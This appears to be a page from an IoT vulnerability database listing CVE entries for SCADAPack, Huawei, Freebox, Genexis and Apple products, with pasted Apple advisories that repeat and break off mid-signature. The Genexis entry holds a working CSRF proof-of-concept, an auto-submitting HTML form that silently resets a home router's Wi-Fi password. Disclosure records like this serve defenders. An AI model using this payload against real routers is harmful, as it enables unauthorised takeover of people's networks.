VARIoT IoT vulnerabilities database
| VAR-202009-1312 | CVE-2020-7529 | SCADAPack 7x Remote Connect Traversal Vulnerability in Japan |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
A CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Transversal') vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place content in any unprotected folder on the target system using a crafted .RCZ file. SCADAPack 7x Remote Connect Contains a path traversal vulnerability.Information may be tampered with. SCADAPack is an intelligent field controller of French Schneider-electric. The controller combines the monitoring and communication capabilities of remote terminal control (RTU), the processing and data recording functions of programmable logic controllers (PLC). Remote process monitoring and autonomous control provide excellent functions. Attackers can use this vulnerability to access locations outside of the restricted directory
| VAR-202009-1311 | CVE-2020-7528 | SCADAPack 7x Remote Connect Unreliable Data Deserialization Vulnerability in |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
A CWE-502 Deserialization of Untrusted Data vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which could allow arbitrary code execution when an attacker builds a custom .PRJ file containing a malicious serialized buffer. SCADAPack 7x Remote Connect Is vulnerable to an untrusted data deserialization.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. SCADAPack 7x RemoteConnect is a software tool for users to monitor, configure, program and debug SCADAPack 470, 474, 570, 574, 575 intelligent RTU.
SCADAPack 7x Remote Connect 3.6.3.574 and earlier versions have code issue vulnerabilities
| VAR-202009-1320 | CVE-2020-9084 | Huawei Taurus-AL00B resource management error vulnerability (CNVD-2020-60319) |
CVSS V2: 4.6 CVSS V3: 6.5 Severity: MEDIUM |
Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a use-after-free (UAF) vulnerability. An authenticated, local attacker may perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege and compromise the service. Huawei Taurus-AL00B is a smart phone of China's Huawei (Huawei) company.
Some Huawei phones have resource management errors. The vulnerability stems from use-after-free (UAF), which can be exploited by attackers to increase privileges and affect services
| VAR-202009-1313 | CVE-2020-7530 | SCADAPack 7x Remote Connect Authorization vulnerability in |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A CWE-285 Improper Authorization vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows improper access to executable code folders. SCADAPack is an intelligent field controller of French Schneider-electric. The controller combines the monitoring and communication capabilities of remote terminal control (RTU), the processing and data recording functions of programmable logic controllers (PLC). Remote process monitoring and autonomous control provide excellent functions. An attacker can use this vulnerability to gain incorrect access to the folder
| VAR-202009-0966 | CVE-2020-24373 | Freebox server cross-site request forgery vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
A CSRF vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3. Freebox Server Contains a cross-site request forgery vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. The Freebox server is a DSL modem, router, Wi-Fi hotspot, NAS (250 GB hard disk), DECT base with up to 8 connected DECT phones, and digital video recorder-T for TNT (also known as DVB) And IPTV.
There is a cross-site request forgery vulnerability in Freebox Server versions prior to 4.2.3, which is caused by the WEB application not fully verifying whether the request comes from a trusted user. An attacker can use this vulnerability to send unexpected requests to the server through the affected client
| VAR-202009-0727 | CVE-2020-25015 |
Genexis Platinum cross-site request forgery vulnerability
Related entries in the VARIoT exploits database: VAR-E-202011-0011 |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
# Date: 28-08-2020
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
# Version: v2.1 (software version P4410-V2-1.28)
# CVE : CVE-2020-25015
1.
2.
3. Proof of Concept
Create an HTML file with the following code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
<input type="hidden" name="wlEnbl" value="ON" />
<input type="hidden" name="hwlKeys0" value="" />
<input type="hidden" name="hwlKeys1" value="" />
<input type="hidden" name="hwlKeys2" value="" />
<input type="hidden" name="hwlKeys3" value="" />
<input type="hidden" name="hwlgMode" value="9" />
<input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
<input type="hidden" name="hwlEnbl" value="1" />
<input type="hidden" name="hWPSMode" value="1" />
<input type="hidden" name="henableSsid" value="1" />
<input type="hidden" name="hwlHide" value="0" />
<input type="hidden" name="isInWPSing" value="0" />
<input type="hidden" name="WpsConfModeAll" value="7" />
<input type="hidden" name="WpsConfModeNone" value="0" />
<input type="hidden" name="hWpsStart" value="0" />
<input type="hidden" name="isCUCSupport" value="0" />
<input type="hidden" name="SSIDPre" value="N/A" />
<input type="hidden" name="bwControlhidden" value="0" />
<input type="hidden" name="ht_bw" value="1" />
<input type="hidden" name="wlgMode" value="b,g,n" />
<input type="hidden" name="wlChannel" value="0" />
<input type="hidden" name="wlTxPwr" value="1" />
<input type="hidden" name="wlSsidIdx" value="0" />
<input type="hidden" name="SSID_Flag" value="0" />
<input type="hidden" name="wlSsid" value="JINSON" />
<input type="hidden" name="wlMcs" value="33" />
<input type="hidden" name="bwControl" value="1" />
<input type="hidden" name="giControl" value="1" />
<input type="hidden" name="enableSsid" value="on" />
<input type="hidden" name="wlAssociateNum" value="32" />
<input type="hidden" name="wlSecurMode" value="WPAand11i" />
<input type="hidden" name="wlPreauth" value="off" />
<input type="hidden" name="wlNetReauth" value="1" />
<input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
<input type="hidden" name="cb_enablshowpsw" value="on" />
<input type="hidden" name="wlWpaGtkRekey" value="" />
<input type="hidden" name="wlRadiusIPAddr" value="" />
<input type="hidden" name="wlRadiusPort" value="" />
<input type="hidden" name="wlRadiusKey" value="" />
<input type="hidden" name="wlWpa" value="TKIPAES" />
<input type="hidden" name="wlKeyBit" value="64" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="WpsActive" value="0" />
<input type="hidden" name="wpsmode" value="ap-pbc" />
<input type="hidden" name="pinvalue" value="" />
<input type="hidden" name="Save_Flag" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
3. Timeline
Vulnerability reported to the Genexis team – August 28, 2020
Team confirmed firmware release containing fix – September 14, 2020
| VAR-202009-0228 | CVE-2020-13259 | RAD SecFlow-1v Cross Site Request Forgery Vulnerability |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in the web-based management interface of RAD SecFlow-1v os-image SF_0290_2.3.01.26 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260. RAD SecFlow-1v Contains a cross-site request forgery vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state
| VAR-202009-1314 | CVE-2020-7531 | SCADAPack 7x Remote Connect Vulnerability in |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
A CWE-284 Improper Access Control vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place executables in a specific folder and run code whenever RemoteConnect is executed by the user. SCADAPack 7x Remote Connect Contains an unspecified vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. SCADAPack is an intelligent field controller of French Schneider-electric. The controller combines the monitoring and communication capabilities of remote terminal control (RTU), the processing and data recording functions of programmable logic controllers (PLC). Remote process monitoring and autonomous control provide excellent functions
| VAR-202010-1518 | CVE-2020-9973 | Apple iOS Buffer error vulnerability |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave, iOS 14.0 and iPadOS 14.0. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. An attacker could exploit this vulnerability to cause an unexpected system termination or write to kernel memory. Apple iOS and iPadOS could allow a remote malicious user to execute arbitrary code on the system, caused by an out-of-bounds read in the Model I/O component. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 are now available and address the following:
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of Ant-Financial LightYear Labs
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9773: Chilik Tamir of Zimperium zLabs
IDE Device Support
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code on a paired device during a debug session over
the network
Description: This issue was addressed by encrypting communications
over the network to devices running iOS 14, iPadOS 14, tvOS 14, and
watchOS 7.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester(@xpn) of TrustedSec
Siri
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A person with physical access to an iOS device may be able to
view notification contents from the lockscreen
Description: A lock screen issue allowed access to messages on a
locked device.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
Location Framework
We would like to acknowledge an anonymous researcher for their
assistance.
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge an anonymous researcher for their
assistance.
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl9igm4ACgkQZcsbuWJ6
jjDK/hAAndL9caBfy/uHMnz9jhpDNrJuDai5gTZeAhUSwRalVppYwTEMpcSrx7u6
O7R0uLcvd1v9AiTGpF2zcERNlQbd7L1GaErPBaWnPbXSzLoUDkCNxuw5S+EEGuF5
nOxvh+qaS1ISny6teXpW6VLvLqV6n3BuNHUAbyP1JuF/EB7V9R1MD8zOUM7jsn6t
Lwyz++s1nQbwt2jH1OKZa0pP2cSjVJjlKi8iDnFnMUjaSn8LCsgNXTsvipX8rA7r
aeUxlPkIA2bwM5/0CFoPWpoPjNKXxoADjryJOat0GjPp/dSewrXncE/aKvrJGcJ7
Hwg4Q2Ep8a6NKL1QZ3ST64kf28UTA06xcypzinIpJVqtLj8LOvRDUGak3h+xETHB
E4evSHlNfDzKrzu7kArguneeh4IwSpN1kSc4kt2rGpAQ0ch0bT34AzbNDpoUidm1
oPU3WVcEeBD9PYKGAWMiBcm3X6B0wHsAYDLCgkqnxrbDgz7NlsmVIl3dvrVbLrl1
jxaVaofaqANk+uTzoB1QArZRowf5GzW17htRijPazna1qYHo6jp/fzrGbdoMDuhb
80JpytEZrrVvscbth4bTeex52ibn1XFM9kqAX/Mfxaob2zBKt0fF6v3utFRKmx9g
fhqMR3CPf7QVG8mlYMQ57OT7iuQ4lYkFw9qGgPI4SGWiMWWVtUU=
=7kDq
-----END PGP SIGNATURE-----
.
Information about the security content is also available at
https://support.apple.com/HT211849.
CoreAudio
Available for: macOS Catalina 10.15
Impact: Playing a malicious audio file may lead to arbitrary code
execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative,
JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
Find My
Available for: macOS Catalina 10.15
Impact: A malicious application may be able to read sensitive
location information
Description: A file access issue existed with certain home folder
files.
CVE-2020-9981: found by OSS-Fuzz
Entry added November 12, 2020
Mail
Available for: macOS High Sierra 10.13.6
Impact: A remote attacker may be able to unexpectedly alter
application state
Description: This issue was addressed with improved checks.
Installation note:
macOS Catalina 10.15.7, Security Update 2020-005 High Sierra,
Security Update 2020-005 Mojave may be obtained from the Mac App
Store or Apple's Software Downloads web site:
https://support.apple.com/downloads/
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl+uxoYACgkQZcsbuWJ6
jjCHdw//WLFqNbXU96dGvxxomfbZOJcbQJZNR2IfaJdfgyh7tXDM0iQ6u3pYiaE4
6ChayI2VZ7y0Aq0X8PkuIOCbin++/moGLuGrIEOYHaA9aiohD+YX9WMcKrk55B1K
LBhZ9bBz2gPBzOUhVO63XW7nspS9tzhL+nyt1q4WeLbcYaLvEdV1ZJyrtQ7aBw1D
RKFTKKxvOTgo+EdTq67zqWQNkTLdaz1Ls1NonDCVnd/p4M10Aa6iCUyA/q2OZFEL
dmHAab1m+RBtkMCBaOXLlxQ09aBrBsJPQFRq0bH5btR1Od4GHyA+eXBmOLCggrM1
f64jsg/m9E+XgZ0OcBQ9X5Yh4kyBKw00EORGuSREAlvXl2WD87GlQzUpa53aMFf/
TjVEG79nWEWzxzNDFRPq6PXLrdbEUFizEEw0FffNPi4KjykntKtnQFJoqZiiWsSM
Zmx7TI83KAdDYLusw5RYGhTb2fpfQKHLENnRpYvPC+b+pCyu+6RJC+mxHY2W9iAS
K/yULJhphnQWyLO7kiiqLD1t77CDTUXNneei4WpS+L3SA7EjdcyLt/CZv4pBD2n1
/4RZXacoP1D7GabKK0DOB3tZHRqOuWa24NlkK3IzuejJJCbVhtji1yex7wU6gTW+
GEvH223424RO/8Kssd0/cgGfXQszDQLxZZIzooEUjxVcQ7tkxaI=
=QB9p
-----END PGP SIGNATURE-----
| VAR-202010-1520 | CVE-2020-9979 | Apple iOS Security hole |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
A trust issue was addressed by removing a legacy API. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0. An attacker may be able to misuse a trust relationship to download malicious content. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-11-13-4 Additional information for
APPLE-SA-2020-09-16-2 tvOS 14.0
tvOS 14.0 addresses the following issues. Information about the
security content is also available at
https://support.apple.com/HT211843.
CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative,
JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreCapture
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9968: Adam Chester (@_xpn_) of TrustedSec
Entry updated September 17, 2020
SQLite
Available for: Apple TV 4K and Apple TV HD
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
Entry added November 12, 2020
SQLite
Available for: Apple TV 4K and Apple TV HD
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
CVE-2020-15358
Entry added November 12, 2020
SQLite
Available for: Apple TV 4K and Apple TV HD
Impact: A maliciously crafted SQL query may lead to data corruption
Description: This issue was addressed with improved checks.
CVE-2020-10013: Yu Wang of Didi Research America
Entry added November 12, 2020
Additional recognition
Audio
We would like to acknowledge JunDong Xie and XingWei Lin of Ant-
financial Light-Year Security Lab for their assistance. Alternatively,
you may manually check for software updates by selecting
"Settings -> System -> Software Update -> Update Software."
To check the current version of software, select
"Settings -> General -> About."
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl+uyHoACgkQZcsbuWJ6
jjAwvw/+LOihEZ6W7DntL6nfl432KOZ58vNbauzTxYCo6HHsfu9d80SP7BF/BiIf
5rXBfJSyP8K0cQwmhli5xv4DH2VPSwP9GKZXDEG9OYQoHZJ3aie2bOUyPlH14WTZ
JbL00oIdSXaPeovCNah6ahyI6apX63NpJr3FZkbNCDFsGdv7bjkoshRacGMkVSqG
ytAoAsTpuaQEzHCWkvj0hdUasB/VmlnZQS5CzasGplL+1Y6pkwxjxEnN4BlV1/Zn
r7ZWn2SOrf1UZoB/TAE39WdXY7pZ2WfDIyOzIqCioPc3ZlE7bRh7KKRMHwXNDp6Q
XMeb6G818+XpHFKTV/NbLKpq0SjS8YEVhPmpS5e30HepgGbU3h/ufjqJQdnSWyj4
P33pI5Bfo5nFISyyJ+EsDczfWjpUn10F3xiOUb3IZcFuXrbkCFx4GrpnZ25eg1Z0
sXSTq9+lSc1lqDkyBVRNyWAKp5/lsLAmV+WaFugv9svXoxdDyYVA9waFiaxnGHPy
E1hTrVKUFKZmUmiYxEo4b/LSdr8IdaLvsdlWb/4z+C9c1ei/U+yMtOYU8U+JCsVP
4v5hVcnPvL7sFiKfBPW7LsvRq5z1L58l61AivGbPZRkRG4oObOtoWvec4ygQ6tbM
Hmc8HATllbUSoeu0eTtnlYgIKdia14DQFclcbTdMBU37y0DrBJc=
=CBpG
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 are now available and address the following:
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of Ant-Financial LightYear Labs
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9773: Chilik Tamir of Zimperium zLabs
IDE Device Support
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code on a paired device during a debug session over
the network
Description: This issue was addressed by encrypting communications
over the network to devices running iOS 14, iPadOS 14, tvOS 14, and
watchOS 7.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester(@xpn) of TrustedSec
Siri
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A person with physical access to an iOS device may be able to
view notification contents from the lockscreen
Description: A lock screen issue allowed access to messages on a
locked device.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
Location Framework
We would like to acknowledge an anonymous researcher for their
assistance.
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge an anonymous researcher for their
assistance.
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl9igm4ACgkQZcsbuWJ6
jjDK/hAAndL9caBfy/uHMnz9jhpDNrJuDai5gTZeAhUSwRalVppYwTEMpcSrx7u6
O7R0uLcvd1v9AiTGpF2zcERNlQbd7L1GaErPBaWnPbXSzLoUDkCNxuw5S+EEGuF5
nOxvh+qaS1ISny6teXpW6VLvLqV6n3BuNHUAbyP1JuF/EB7V9R1MD8zOUM7jsn6t
Lwyz++s1nQbwt2jH1OKZa0pP2cSjVJjlKi8iDnFnMUjaSn8LCsgNXTsvipX8rA7r
aeUxlPkIA2bwM5/0CFoPWpoPjNKXxoADjryJOat0GjPp/dSewrXncE/aKvrJGcJ7
Hwg4Q2Ep8a6NKL1QZ3ST64kf28UTA06xcypzinIpJVqtLj8LOvRDUGak3h+xETHB
E4evSHlNfDzKrzu7kArguneeh4IwSpN1kSc4kt2rGpAQ0ch0bT34AzbNDpoUidm1
oPU3WVcEeBD9PYKGAWMiBcm3X6B0wHsAYDLCgkqnxrbDgz7NlsmVIl3dvrVbLrl1
jxaVaofaqANk+uTzoB1QArZRowf5GzW17htRijPazna1qYHo6jp/fzrGbdoMDuhb
